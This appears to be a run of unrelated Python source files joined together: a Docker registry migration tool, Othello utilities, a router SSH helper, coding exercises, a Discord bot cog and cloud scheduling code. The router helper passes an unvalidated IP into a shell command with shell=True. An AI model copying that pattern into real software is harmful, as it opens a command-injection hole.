(MIN_NUM_OF_WORKERS, MAX_NUM_OF_WORKERS)) # Set up and verify the connection to the source registry source = DockerRegistryAccess(url=args.source, username=args.source_username, password=args.source_password, ignore_cert=args.ignore_cert) common_migration(args, work_dir, source, registry) ''' ECR migration @param args - The user provided arguments @param work_dir - The temporary work directory ''' def ecr_migration(args, work_dir): if args.workers < MIN_NUM_OF_WORKERS or args.workers > MAX_NUM_OF_WORKERS: parser.error("--num-of-workers must be between %d and %d." % (MIN_NUM_OF_WORKERS, MAX_NUM_OF_WORKERS)) # Set up and verify the connection to the source registry source = DockerRegistryAccess(url=args.source, username='AWS', password=args.token, method='basic', ignore_cert=args.ignore_cert) common_migration(args, work_dir, source, "ecr") ''' GCR migration @param args - The user provided arguments @param work_dir - The temporary work directory ''' def gcr_migration(args, work_dir): if args.workers < MIN_NUM_OF_WORKERS or args.workers > MAX_NUM_OF_WORKERS: parser.error("--num-of-workers must be between %d and %d." 
% (MIN_NUM_OF_WORKERS, MAX_NUM_OF_WORKERS)) password = parse_key_file(args.keyfile) if not password: sys.exit("Unable to read key file or key is empty.") # Set up and verify the connection to the source registry source = DockerRegistryAccess(url=args.source, username='_json_key', password=password, method='basic', ignore_cert=args.ignore_cert) common_migration(args, work_dir, source, "gcr") ''' DTR migration @param args - The user provided arguments @param work_dir - The temporary work directory ''' def dtr_migration(args, work_dir): if args.workers < MIN_NUM_OF_WORKERS or args.workers > MAX_NUM_OF_WORKERS: parser.error("--num-of-workers must be between %d and %d." % (MIN_NUM_OF_WORKERS, MAX_NUM_OF_WORKERS)) # Set up and verify the connection to the source registry source = DTRAccess(url=args.source, username=args.dtr_username, password=args.dtr_password, ignore_cert=args.ignore_cert) common_migration(args, work_dir, source, "ecr") ''' Common migration procedure @param args - The user provided arguments @param work_dir - The temporary work directory @param source - The source access @registry - The source registry (for info only) ''' def common_migration(args, work_dir, source, registry="NA"): if not source.verify_is_v2(): sys.exit("The provided URL does not appear to be a valid V2 repository.") # Set up and verify the connection to Artifactory art_access = setup_art_access(args.artifactory, args.username, args.password, args.repo, args.ignore_cert) image_names = [] q = Queue.Queue() # Build the list of image/tags # If the user provides a set of images, don't query the upstream if 'image_file' in args and args.image_file: image_names, images = parse_image_file(args.image_file) for image_name, tag in images: q.put_nowait((image_name, tag)) else: logging.info("Requesting catalog from source registry.") image_names = source.get_catalog() if not image_names: print "Found no repositories." if image_names: print "Found %d repositories." % len(image_names) populate_tags(image_names, source, q) if not q.empty(): # Perform the migration perform_migration(source, art_access, q, work_dir, registry) else: print "Nothing to migrate." ''' Set up and verify the connection to Artifactory @param artifactory_url - The URL to the Artifactory instance @param username - The username to access Artifactory @param password - The password (API Key, encrypted password, token) to access Artifactory @param repo - The repo name @param ignore_cert - True if the certificate to this instance should be ignored ''' def setup_art_access(artifactory_url, username, password, repo, ignore_cert): art_access = ArtifactoryDockerAccess(url=artifactory_url, username=username, password=password, repo=repo, ignore_cert=ignore_cert) if not art_access.is_valid(): sys.exit("The provided Artifactory URL or credentials do not appear valid.") if not art_access.is_valid_version(): sys.exit("The provided Artifactory instance is version %s but only 4.4.3+ is supported." % art_access.get_version()) if not art_access.is_valid_docker_repo(): sys.exit("The repo %s does not appear to be a valid V2 Docker repository." % args.repo) return art_access ''' Finds and populates the tags for a set of image names @param image_names - A list of images names @param source - Access to the source registry @param q - The queue to populate with (image_name, tag) tuples ''' def populate_tags(image_names, source, q): print "Populating set of image/tags..." 
for image_name in image_names: image_name = str(image_name) tags = source.get_tags(image_name) if tags: print "Found %d tags for repository %s." % (len(tags), image_name) for tag in tags: tag = str(tag) q.put_nowait((image_name, tag)) ''' Perform the migration @param source - Access to the source registry @param art_access - Access to the Artifactory destination @param q - The queue of (image, tag) tuples that have to be migrated @param work_dir - The temporary working directory @registry - The source registry (for info only) ''' def perform_migration(source, art_access, q, work_dir, registry="NA"): print "Performing migration for %d image/tags." % q.qsize() art_access.report_usage(registry) m = Migrator(source, art_access, q, args.workers, args.overwrite, work_dir) m.migrate() print "Migration finished." # Report any skipped images skipped_list = list(m.get_skipped_queue().queue) skipped_count = len(skipped_list) if skipped_list and skipped_count > 0: print "Skipped %d images because they already exist in Artifactory." % skipped_count # Report on any failures failure_list = list(m.get_failure_queue().queue) failure_count = len(failure_list) if failure_list and failure_count > 0: print "Failed to migrate the following %d images: " % failure_count for image, tag in failure_list: print " %s/%s" % (image, tag) def quay_migration(args, work_dir): # Set up and verify the connection to Artifactory art_access = setup_art_access(args.artifactory, args.username, args.password, args.repo, args.ignore_cert) q = Queue.Queue() # If the user provides a set of images, don't query the upstream if 'image_file' in args and args.image_file: image_names, images = parse_image_file(args.image_file) for image_name, tag in images: q.put_nowait((image_name, tag)) else: quay = QuayAccess(args.namespace, args.token) image_names = quay.get_catalog() if not image_names: logging.error("Failed to retrieve catalog.") # Set up the token based connection to Quay source = DockerRegistryAccess(url="https://quay.io", username="$oauthtoken", password=args.token, ignore_cert=args.ignore_cert) if image_names: print "Found %d repositories." % len(image_names) populate_tags(image_names, source, q) if not q.empty(): # Perform the migration perform_migration(source, art_access, q, work_dir, "quay") else: print "Nothing to migrate." 
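# A minimal usage sketch for parse_image_file(); the path 'images.txt' and both
# entries are hypothetical. It illustrates the two accepted line formats described
# in the docstring above: '<image-name>' (migrate every tag of the repository) and
# '<image-name>:<tag>' (migrate a single tag). The helper below is illustrative and
# is never called by the migrator itself.
def _example_parse_image_file():
    with open('images.txt', 'w') as f:
        f.write('library/ubuntu\n')        # bare name: import all tags of this repository
        f.write('library/alpine:3.9\n')    # name:tag pair: import only this tag
    image_names, images = parse_image_file('images.txt')
    # image_names == ['library/ubuntu']
    # images == [('library/alpine', '3.9')]
    return image_names, images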
def quay_ee_migration(args, work_dir):
    # Verify arguments
    if bool(args.source_username) != bool(args.source_password):
        parser.error("--source-username and --source-password must both be provided or neither.")
    if bool(args.token) and bool(args.source_username):
        parser.error("The token and source username/password arguments are mutually exclusive.")
    if not(bool(args.token) or bool(args.source_username)):
        parser.error("The token or source username/password arguments must be specified.")
    if bool(args.token):
        # Transform the token into username/password
        args.source_username = "$oauthtoken"
        args.source_password = args.token
    generic_migration(args, work_dir, "quayee")


def setup_logging(level):
    fmt = "%(asctime)s [%(threadName)s] [%(levelname)s]"
    fmt += " (%(name)s:%(lineno)d) - %(message)s"
    formatter = logging.Formatter(fmt)
    stdouth = logging.StreamHandler(sys.stdout)
    stdouth.setFormatter(formatter)
    logger = logging.getLogger()
    logger.setLevel(level)
    logger.handlers = []
    logger.addHandler(stdouth)


if __name__ == '__main__':
    # Argument parsing
    logging.info("Parsing and verifying user provided arguments.")
    parser = get_arg_parser()
    args = parser.parse_args()
    # Set log level
    if args.verbose:
        setup_logging(logging.INFO)
    else:
        setup_logging(logging.WARN)
    # Create temp dir
    work_dir = os.path.join(dir_path, 'workdir')
    if not os.path.exists(work_dir):
        try:
            os.makedirs(work_dir)
        except:
            sys.exit("Failed to create work directory '%s'" % work_dir)
    # Calls the appropriate function based on user's selected operation
    args.func(args, work_dir)
    # Delete temp dir
    if os.path.exists(work_dir):
        shutil.rmtree(work_dir, ignore_errors=True)
# Compatibility layer for Python 2.6: try loading unittest2
import sys
if sys.version_info[:2] == (2, 6):
    try:
        import unittest2 as unittest
    except ImportError:
        raise Exception('The test suite requires unittest2 on Python 2.6')
else:
    import unittest
<filename>utils.py
import time
import copy

N = 8
DIR = [1,-1,8,-8,9,-9,7,-7]
dirx = [-1, 0, 1, -1, 1, -1, 0, 1]
diry = [-1, -1, -1, 0, 0, 1, 1, 1]

def opponent(player):
    return 1 if player == 2 else 2

def move(x, y, player, board):
    totctr = 0  # total number of opponent pieces taken
    board[N*y + x] = player
    for d in range(8):  # 8 directions
        ctr = 0
        for i in range(N):
            dx = x + dirx[d] * (i + 1)
            dy = y + diry[d] * (i + 1)
            if dx < 0 or dx > N - 1 or dy < 0 or dy > N - 1:
                ctr = 0; break
            elif board[dy*N + dx] == player:
                break
            elif board[dy*N + dx] == 0:
                ctr = 0; break
            else:
                ctr += 1
        for i in range(ctr):
            dx = x + dirx[d] * (i + 1)
            dy = y + diry[d] * (i + 1)
            board[dy*N + dx] = player
        totctr += ctr
    return (board, totctr)

# What moves can we make?
def get_moves(board, player):
    validMoves = []
    for i, piece in enumerate(board):
        if not piece:
            (tmp_board, tot) = move(i%N, int(i/N), player, copy.deepcopy(board))
            """
            for movement in DIR:
                valid = False
                d = i + movement
                row = int(d/N)
                col = d%N
                if row < 0 or row > N - 1 or col < 0 or col > N - 1 or d < 0:
                    continue
                elif board[d] == player:
                    continue
                elif board[d] == 0:
                    continue
                else:
                    valid = True
                valid and i not in validMoves and validMoves.append(i)
            """
            tot and i not in validMoves and validMoves.append(i)
    return validMoves

# Apply a move to a board
def make_move(move, player, board):
    board[move] = player
    for d in DIR:
        make_flips(move, player, board, d)
    return board

def make_flips(move, player, board, direction):
    bracket = find_bracket(move, player, board, direction)
    if not bracket:
        return
    square = move + direction
    while square != bracket:
        board[square] = player
        square += direction

def find_bracket(square, player, board, direction):
    bracket = square + direction
    row = int(bracket/N)
    col = bracket%N
    if row < 0 or row > N - 1 or col < 0 or col > N - 1 or bracket < 0 or bracket > 63:
        return None
    if board[bracket] == player:
        return None
    opp = opponent(player)
    while board[bracket] == opp:
        bracket += direction
        row = int(bracket/N)
        col = bracket%N
        if row < 0 or row > N - 1 or col < 0 or col > N - 1 or bracket < 0:
            return None
    return bracket

# Heuristic to use (corners are apparently worth more?)
def score(board, player):
    tot = 0
    for i, piece in enumerate(board):
        if piece == player:
            row = int(i/N)
            col = i%N
            if (row == 0 or row == N - 1) and (col == 0 or col == N - 1):
                tot += 4  # corner
            elif (row == 0 or row == N - 1) or (col == 0 or col == N - 1):
                tot += 2  # side
            else:
                tot += 1
    return tot

def lastMove(board, player):
    return not len(get_moves(board, player))
import subprocess
import socket
import struct
import re
from pexpect import pxssh
from networking import configuration, shared

def get_default_gateway():
    with open("/proc/net/route") as f:
        for line in f:
            fields = line.strip().split()
            if fields[1] != "00000000" or not int(fields[3], 16) & 2:
                continue
            return socket.inet_ntoa(struct.pack("<L", int(fields[2], 16)))

def ping(ip):
    try:
        subprocess.check_output("ping -c 2 -q " + ip, shell=True)
    except Exception:
        return False
    return True

def clear_output(before):
    return before.decode("UTF-8").replace("\r", "").split("\n")

def get_hostname(before):
    return clear_output(before)[-1]

def check_conn(session, ip):
    configuration.send_commands(session, ["ping " + ip + " r 3"])
    output = clear_output(session.before)[-2]
    percentage = output.split()[3]
    return 0 < int(percentage)

def aton(ip):
    return struct.unpack("!L", socket.inet_aton(ip))[0]

def ntoa(ip):
    return socket.inet_ntoa(struct.pack("!L", ip))

def net_from_ip_mask(ip, mask):
    return ntoa(aton(ip) & aton(mask))

def get_wildcard(mask):
    return ntoa(0xFFFFFFFF & ~aton(mask))

def get_broadcast(network, mask):
    net = aton(net_from_ip_mask(network, mask))
    wildcard = aton(get_wildcard(mask))
    return ntoa(net + wildcard)

def check_range_from_network(ip_add, network, mask):
    net = aton(network)
    broadcast = aton(get_broadcast(network, mask))
    ip = aton(ip_add)
    return ip > net and ip < broadcast

def get_connections(session):
    configuration.send_commands(session, ["sh run | inc interface | ip address | shu"])
    lines = clear_output(session.before)
    lines.pop(0)
    lines.pop()
    table = []
    interface = {}
    active = False
    for line in lines:
        fields = line.strip().split()
        if fields[0] == "interface":
            if active:
                table.append(interface)
                interface = {}
            active = True
            interface["name"] =
fields[1] elif fields[0] == "ip": interface["ip"] = fields[2] interface["net"] = net_from_ip_mask(fields[2], fields[3]) interface["mask"] = fields[3] elif fields[0] == "shutdown": active = False return table def get_all_connections(session): configuration.send_commands(session, ["sh run | inc interface | ip address | shu"]) lines = clear_output(session.before) lines.pop(0) lines.pop() table = [] interface = None for line in lines: fields = line.strip().split() if fields[0] == "interface": if interface is not None: table.append(interface) interface = { "name": translate_to_flask(fields[1]), "ip": "unassigned", "mask": "unassigned", "net": "unassigned", "is_active": True, } elif fields[0] == "ip": interface["ip"] = fields[2] interface["net"] = net_from_ip_mask(fields[2], fields[3]) interface["mask"] = fields[3] elif fields[0] == "shutdown": interface["is_active"] = False table.append(interface) return table def get_next_hop(fields): ip = aton(fields["ip"]) net = aton(fields["net"]) if net + 1 == ip: return ntoa(ip + 1) else: return ntoa(ip - 1) def get_next_hops(session, connections): hops = [] for conn in connections: hop = get_next_hop(conn) hops.append({"source": conn["ip"], "hop": hop, "mask": conn["mask"]}) return hops def login(ip): session = pxssh.pxssh() session.login(ip, shared.username, shared.password, auto_prompt_reset=False) session.sendline("term length 0") session.expect("#") shared.hostname = get_hostname(session.before) return session def get_users(session): configuration.send_commands(session, ["sh run | i user"]) lines = clear_output(session.before) lines.pop(0) lines.pop() users = [] for line in lines: fields = line.strip().split() if fields[0] == "username": users.append(fields[1]) return users def check_user(session, user): users = get_users(session) return user in users def get_information(session): configuration.send_commands( session, ["show version | include Software | processor"] ) lines = clear_output(session.before) lines.pop(0) lines.pop() return {"os": lines[0].split()[7], "brand": lines[1]} def check_interface(session, interface): connections = get_all_connections(session) for conn in connections: if translate_to_router(conn["name"]) == interface: return conn return None def get_all_interfaces(session): configuration.send_commands(session, ["sh ip int br"]) lines = clear_output(session.before) lines.pop(0) lines.pop() interfaces = [] for line in lines: fields = line.strip().split() if fields[0] != "Interface": interfaces.append(fields[0]) return interfaces def translate_to_flask(interface_name): return interface_name.replace("/", "-") def translate_to_router(interface_name): return interface_name.replace("-", "/") def validate_ip(ip): pattern = re.compile( "^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$" ) return pattern.search(ip) def get_prefix(mask): wildcard = aton(get_wildcard(mask)) counter = 0 while wildcard != 0: counter += 1 wildcard >>= 1 return 32 - counter from tca import *<reponame>CHChang810716/LanYunERP<filename>backend/setup/lanyunerpbe/apps.py from django.apps import AppConfig class LanyunerpbeConfig(AppConfig): default_auto_field = 'django.db.models.BigAutoField' name = 'lanyunerpbe' from giraphics.graphing.figure import * def func(x): return math.exp(x-math.sin(x)) f = Figure(600, 450, 15, 10, "fig.svg", origin=[-5,-5]) f.grid() f.plot(func, colour="red") # f.grid2(colour="blue") f.ticks(markers=True) f.xlabel(label="f(x)") f.ylabel() f.title("Title") f.save() f.display()#Aula 114 #Desafio: ''' 
'''<reponame>beckernick/cml_rapids<filename>testing.py import cudf ## Simple hello world script to verify that everything is working train_path = "data/application_train.csv" tips_df = cudf.read_csv(train_path) print("the dataframe is shaped: {0}".format(tips_df.shape))<reponame>yiyinghsieh/python-algorithms-data-structures<gh_stars>0 """Codewars: Easy Line 7 kyu URL: https://www.codewars.com/kata/56e7d40129035aed6c000632/train/python In the drawing below we have a part of the Pascal's triangle, lines are numbered from zero (top). [ [1], [1, 1], [1, 2, 1], [1, 3, 3, 1], [1, 4, 6, 4, 1], ... ] We want to calculate the sum of the squares of the binomial coefficients on a given line with a function called easyline (or easyLine or easy-line). Can you write a program which calculate easyline(n) where n is the line number? The function will take n (with: n>= 0) as parameter and will return the sum of the squares of the binomial coefficients on line n. ##Examples: easyline(0) => 1 easyline(1) => 2 easyline(4) => 70 easyline(50) => 100891344545564193334812497256 ##Ref: http://mathworld.wolfram.com/BinomialCoefficient.html """ def easyline1(n): if n <= 1: return sum([1] * (n + 1)) # Create "raw" Pascal's triangle T = [] for i in range(n + 1): T.append([1] * (i + 1)) # Iterate through rows to update middle numbers. for i in range(2, n + 1): for j in range(1, len(T[i]) - 2 + 1): T[i][j] = T[i-1][j-1] + T[i-1][j] # Take the last to compute sum of squares. squared_sum = 0 for num in T[-1]: squared_sum += num**2 return squared_sum def easyline2(n): if n <= 1: return sum([1] * (n + 1)) T = [] for i in range(n + 1): T.append([1] * (i + 1)) for j in range(1, len(T[i]) - 2 + 1): T[i][j] = T[i - 1][j - 1] + T[i - 1][j] squared_sum = 0 for num in T[-1]: squared_sum += num **2 return squared_sum def easyline3(n): if n <= 1: return sum([1] * (n + 1)) # 1st prev_row for the 2nd row. 
prev_row = [1, 1] # Whiteboard debugging: # i = 3 # prev_row = [1, 2, 1] # row = [1, 3, 3, 1] # len(row) = 4 # j in 1 ~ 2 # j = 1: row[1] = prev_row[0] + prev_row[1] = 1 + 2 = 3 # j = 2: row[2] = prev_row[1] + prev_row[2] = 2 + 1 = 3 for i in range(2, n + 1): row = [1] * (i + 1) for j in range(1, len(row) - 2 + 1): row[j] = prev_row[j - 1] + prev_row[j] prev_row = row squared_sum = sum([num ** 2 for num in row]) return squared_sum def main(): # Output: 1 n = 0 print(easyline1(n)) print(easyline2(n)) print(easyline3(n)) # Output: 2 n = 1 print(easyline1(n)) print(easyline2(n)) print(easyline3(n)) # Output: 6 n = 2 print(easyline1(n)) print(easyline2(n)) print(easyline3(n)) # Output: 20 n = 3 print(easyline1(n)) print(easyline2(n)) print(easyline3(n)) # Output: 70 n = 4 print(easyline1(n)) print(easyline2(n)) print(easyline3(n)) # Output: 252 n = 5 print(easyline1(n)) print(easyline2(n)) print(easyline3(n)) if __name__ == '__main__': main() <filename>src/python/main.py import os import multiprocessing import cPickle as pickle import worker TMPDIR = "/tmp/" WORKERS = 60 total_tasks = 0 def retrieve_tasks(dataset_id): if dataset_id == 11: bucket = "zfish" elif dataset_id == 1: bucket = "e2198_compressed" with open("{}{}.tasks".format(TMPDIR, bucket), "rb") as f: return bucket, pickle.load(f) def worker_main(queue): global proc_tasks while True: task = queue.get(True) if task is None: queue.put(None) # Put it back for other running workers return else: print("Processing task {}/{}".format(task["id"], total_tasks)) os.sys.stdout.flush() worker.calcSpawnTable(task["bucket"], task["pre"], task["post"]) def main(): global total_tasks # Get Worker Tasks print("Loading tasks...") os.sys.stdout.flush() bucket, tasks = retrieve_tasks(11) total_tasks = len(tasks) print("Done. Found {} tasks".format(total_tasks)) os.sys.stdout.flush() # Create Queue and Pool queue = multiprocessing.Queue() pool = multiprocessing.Pool(WORKERS, worker_main, (queue,)) task_cnt = 0 for center_path, neighbor_path in tasks: params = { "id": task_cnt, "bucket": bucket, "pre": center_path, "post": neighbor_path } queue.put(params) task_cnt += 1 # Add poison pill to shutdown workers queue.put(None) # Clean up pool.close() pool.join() if __name__ == '__main__': main() """ Copyright 2020 ETH Zurich, Secure, Reliable, and Intelligent Systems Lab Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. 
""" import csv def get_tests(dataset): if (dataset == 'acasxu'): specfile = './acasxu/specs/acasxu_prop' + str(specnumber) + '_spec.txt' tests = open(specfile, 'r').read() else: csvfile = open('./{}_test.csv'.format(dataset), 'r') tests = csv.reader(csvfile, delimiter=',') return tests zonotope_file = open('./cifar10zt.zt', 'w+') epsilon = 0.026 tests = get_tests('cifar10') image_number = 0 for index, test in enumerate(tests): if index < image_number: continue test = test[1:] zonotope_file.write(str(len(test)) + ' ' + str(1+len(test))+'\n') for dim, a_0 in enumerate(test): current_epsilon = epsilon #normalize to [0, 1] normalized = int(a_0)/255.0 if normalized < epsilon: current_epsilon = (epsilon + normalized)/2 normalized = current_epsilon elif normalized > (1 - epsilon): current_epsilon = (epsilon + (1-normalized))/2 normalized = 1 - current_epsilon zonotope_file.write(str(normalized) + ' ') for i in range(len(test)): if i == dim: zonotope_file.write(str(current_epsilon) + ' ') else: zonotope_file.write('0 ') zonotope_file.write('\n') break zonotope_file.close()import discord from discord.ext import commands from Constants import SUB_COMMANDS_TEXT, SUB_SUB_COMMANDS_TEXT class Help(commands.Cog): def __init__(self, client): self.client = client self.SUB_COMMANDS = [i.lower() for i in SUB_COMMANDS_TEXT] self.SUB_SUB_COMMANDS = [i.lower() for i in SUB_SUB_COMMANDS_TEXT] self.SUB_COMMANDS_EMBEDS = {} self.SUB_SUB_COMMANDS_EMBEDS = {} self.create_main_help_embed() self.create_sub_help_embeds() self.create_sub_sub_help_embeds() @commands.command() async def help(self, ctx, term=None): '''Main help command''' if term == None: _temp_embed = self.main_help_embed await ctx.send(embed=_temp_embed.set_footer(text=f"ordered by {ctx.author}", icon_url=ctx.author.avatar_url)) elif term.lower() in self.SUB_COMMANDS: _temp_embed = self.SUB_COMMANDS_EMBEDS[term.lower()] await ctx.send(embed=_temp_embed.set_footer(text=f"ordered by {ctx.author}", icon_url=ctx.author.avatar_url)) elif term.lower() in self.SUB_SUB_COMMANDS: _temp_embed = self.SUB_SUB_COMMANDS_EMBEDS[term.lower()] await ctx.send(embed=_temp_embed.set_footer(text=f"ordered by {ctx.author}", icon_url=ctx.author.avatar_url)) else: await ctx.send(f"No Sub Command such as `{term}` was found.") def create_main_help_embed(self): '''This function will Create the main help embeds in the starting''' self.main_help_embed = discord.Embed(title="**__Bhendi Bot 3__**", color=discord.Colour.blue()) self.main_help_embed.add_field(name="**Fun**", value="Simple and Fun Commands", inline=False) self.main_help_embed.add_field(name="**Moderation**", value="Commands for Mods", inline=False) self.main_help_embed.add_field(name="**Utility**", value="Utility commands", inline=False) def create_sub_help_embeds(self): '''This function will create the sub command help embeds in the starting''' for _sub_command in SUB_COMMANDS_TEXT: _embed = discord.Embed(title=f"**__{_sub_command}__**", color=discord.Colour.blue()) for _sub_sub_command in SUB_COMMANDS_TEXT[_sub_command]: _embed.add_field(name=f"**{_sub_sub_command}**", value=SUB_COMMANDS_TEXT[_sub_command][_sub_sub_command], inline=False) self.SUB_COMMANDS_EMBEDS[_sub_command.lower()] = _embed def create_sub_sub_help_embeds(self): '''This will create help embeds for each and ever command''' for _sub_sub_command in SUB_SUB_COMMANDS_TEXT: _embed = discord.Embed(title=f"**__{_sub_sub_command.title()}__**", color=discord.Colour.blue()) for _each_commands in SUB_SUB_COMMANDS_TEXT[_sub_sub_command]: 
_embed.add_field(name=f"**{_each_commands}**", value=SUB_SUB_COMMANDS_TEXT[_sub_sub_command][_each_commands], inline=False) self.SUB_SUB_COMMANDS_EMBEDS[_sub_sub_command.lower()] = _embed def setup(client): client.add_cog(Help(client)) import os,copy,argparse from collections import OrderedDict from pypospack.pyposmat.data import PyposmatDataFile from pypospack.pyposmat.data import PyposmatConfigurationFile from pypospack.pyposmat.data import PyposmatDataAnalyzer def str__qoi_constraints(qoi_constraints): s = [] for k,v in qoi_constraints.items(): if k == 'qoi_constraints': s.append(k) for qoic_n,qoic_v in v.items(): s.append("{:5} {:>20} {:^3} {:<10}".format("",qoic_n,qoic_v[0],qoic_v[1])) else: s.append(",".join([str(k),str(v)])) return "\n".join(s) def print__qoi_constraints(qoi_constraints): s = str__qoi_constraints(qoi_constraints) print(s) class Dev__PyposmatDataAnalyzer(PyposmatDataAnalyzer): def filter_with__qoi_constraints(self,kde_df,qoi_constraints): _df = copy.deepcopy(kde_df) for qn in self.datafile.qoi_names: aen = "{}.abserr".format(qn) en = "{}.err".format(qn) _df[aen] = _df[en].abs() for qoic_n,qoic_v in qoi_constraints.items(): nr0,nc0 =_df.shape if qoic_v[0] == '<': _df = _df[_df[qoic_n] < qoic_v[1]] elif qoic_v[0] == '>': _df = _df[_df[qoic_n] > qoic_v[1]] elif qoic_v[0] == '=': _df = _df[_df[qoic_n] == qoic_v[1]] else: raise ValueError('unknown operator, {}'.format(k)) nr1,nc0 =_df.shape s = "{:>20} {:^3} {:<10} {:10} {:10} {:10}".format(qoic_n,qoic_v[0],qoic_v[1],nr1,nr0,nr0-nr1) print(s) return _df def write_kde_file(self,filename): _qoi_constraints = self.configuration.qoi_constraints kde_df = copy.deepcopy(self._df) for k,v in _qoi_constraints.items(): if k == 'qoi_constraints': kde_df = self.filter_with__qoi_constraints(kde_df,v) kde_df = kde_df.reset_index(drop=True) elif k == 'filter_by_qoi_error': kde_df = self.filter_performance_requirements(kde_df,v) kde_df = kde_df.loc[kde_df['is_survive'] == 1] kde_df = kde_df.reset_index(drop=True) elif k == 'filter_by_phase_order': kde_df = self.filter_phase_order(kde_df,v) elif k == 'filter_by_pareto' or k == 'select_pareto_only': if v == True: kde_df = self.calculate_pareto_set(kde_df,v) kde_df = kde_df.loc[kde_df['is_pareto'] == 1] kde_df = kde_df.reset_index(drop=True) elif k == 'filter_by_dmetric': (nr,nc) = kde_df.shape kde_df = self.calculate_d_metric(kde_df) (nr,nc) = kde_df.shape if v[1] == 'pct': pct_to_keep = v[0]/100 n = int((nr * pct_to_keep) //1) else: n = min(v[0],nr) kde_df = kde_df.nsmallest(n,'d_metric') for en in self.error_names: print(en,kde_df[en].max()) (nr,nc) = kde_df.shape else: raise ValueError("unknown qoi_constraint method {}".format(k)) (nr,nc) = kde_df.shape print('after {}: {} remainings'.format(k,nr)) names = ['sim_id'] \ + self.parameter_names \ + self.qoi_names\ + self.error_names types = ['sim_id'] \ + len(self.parameter_names)*['param']\ + len(self.qoi_names)*['qoi']\ + len(self.error_names)*['err'] str_list = [] str_list.append(','.join(names)) str_list.append(','.join(types)) for i_row, row in kde_df[names].iterrows(): str_list.append(','.join([str(v) for v in row.values.tolist()])) with open(filename,'w') as f: f.write("\n".join(str_list)) if __name__ == "__main__": _fn_config=os.path.join("resources","pyposmat.config.in") _fn_data=os.path.join("resources","pyposmat.results.0a.out") _fn_pareto_out=os.path.join("pyposmat.pareto.out") _fn_kde_out=os.path.join("pyposmat.kde.out") pda = PyposmatDataAnalyzer( fn_config=_fn_config, fn_data=_fn_data) 
pda.write_kde_file(filename=_fn_kde_out) <reponame>KONAPAVANKUMAR/django-channels-group-chat import os from channels.routing import ProtocolTypeRouter,URLRouter from django.core.asgi import get_asgi_application import chat.consumers from django.urls import path from channels.auth import AuthMiddlewareStack os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mysite.settings') application = ProtocolTypeRouter({ "http": get_asgi_application(), # Just HTTP for now. (We can add other protocols later.) "websocket" : AuthMiddlewareStack(URLRouter([path('ws/chat/<int:room_name>/',chat.consumers.ChatConsumer.as_asgi())])) })<reponame>meta-chen/AdslProxy #!/usr/bin/env python # -*- coding: utf-8 -*- # @Time : 2019/9/28 12:30 # @Author : Meta_Chen # @File : getip.py # @Software: PyCharm # @Target: 获取公网ip import requests import re class GetIP: ''' 获取本机IP ''' response = requests.get("http://txt.go.sohu.com/ip/soip") def getip(self): text = self.response.text myip = re.findall(r'\d+.\d+.\d+.\d+',text) return myip[0] def main(): getip = GetIP() print(getip.getip()) if __name__ == '__main__': main()import azure.batch.models as batch_models import yaml from azure.batch.models import BatchErrorException from aztk import error from aztk.error import AztkError from aztk.spark import models from aztk.utils import constants, helpers def __get_node(core_cluster_operations, node_id: str, cluster_id: str) -> batch_models.ComputeNode: return core_cluster_operations.batch_client.compute_node.get(cluster_id, node_id) def affinitize_task_to_master(core_cluster_operations, spark_cluster_operations, cluster_id, task): cluster = spark_cluster_operations.get(cluster_id) if cluster.master_node_id is None: raise AztkError("Master has not yet been selected. Please wait until the cluster is finished provisioning.") master_node = core_cluster_operations.batch_client.compute_node.get( pool_id=cluster_id, node_id=cluster.master_node_id) task.affinity_info = batch_models.AffinityInformation(affinity_id=master_node.affinity_id) return task def upload_serialized_task_to_storage(blob_client, cluster_id, task): return helpers.upload_text_to_container( container_name=cluster_id, application_name=task.id, file_path="task.yaml", content=yaml.dump(task), blob_client=blob_client, ) def select_scheduling_target_node(spark_cluster_operations, cluster_id, scheduling_target): # for now, limit to only targeting master cluster = spark_cluster_operations.get(cluster_id) if not cluster.master_node_id: return None return cluster.master_node_id def schedule_with_target( core_cluster_operations, spark_cluster_operations, cluster_id, scheduling_target, task, wait, internal, ): # upload "real" task definition to storage serialized_task_resource_file = upload_serialized_task_to_storage(core_cluster_operations.blob_client, cluster_id, task) # # schedule "ghost" task ghost_task = batch_models.TaskAddParameter( id=task.id, command_line="/bin/bash", ) # tell the node to run the task core_cluster_operations.batch_client.task.add(cluster_id, task=ghost_task) task_working_dir = "/mnt/aztk/startup/tasks/workitems/{}".format(task.id) task_cmd = ( r"source ~/.bashrc; " r"mkdir -p {0};" r"export PYTHONPATH=$PYTHONPATH:$AZTK_WORKING_DIR; " r"export AZ_BATCH_TASK_WORKING_DIR={0};" r"export STORAGE_LOGS_CONTAINER={1};" r"cd $AZ_BATCH_TASK_WORKING_DIR; " r'$AZTK_WORKING_DIR/.aztk-env/.venv/bin/python $AZTK_WORKING_DIR/aztk/node_scripts/scheduling/submit.py "{2}" >> {3} 2>&1'. 
format(task_working_dir, cluster_id, serialized_task_resource_file.blob_source, constants.SPARK_SUBMIT_LOGS_FILE)) node_id = select_scheduling_target_node(spark_cluster_operations, cluster_id, scheduling_target) node_run_output = spark_cluster_operations.node_run( cluster_id, node_id, task_cmd, timeout=120, block=wait, internal=internal) def get_cluster_scheduling_target(core_cluster_operations, cluster_id): cluster_configuration = core_cluster_operations.get_cluster_data(cluster_id).read_cluster_config() return cluster_configuration.scheduling_target def submit_application( core_cluster_operations, spark_cluster_operations, cluster_id, application, remote: bool = False, wait: bool = False, internal: bool = False, ): """ Submit a spark app """ task = spark_cluster_operations._generate_application_task(core_cluster_operations, cluster_id, application, remote) task = affinitize_task_to_master(core_cluster_operations, spark_cluster_operations, cluster_id, task) scheduling_target = get_cluster_scheduling_target(core_cluster_operations, cluster_id) if scheduling_target is not models.SchedulingTarget.Any: schedule_with_target(core_cluster_operations, spark_cluster_operations, cluster_id, scheduling_target, task, wait, internal) else: # Add task to batch job (which has the same name as cluster_id) core_cluster_operations.batch_client.task.add(job_id=cluster_id, task=task) if wait: helpers.wait_for_task_to_complete( job_id=cluster_id, task_id=task.id, 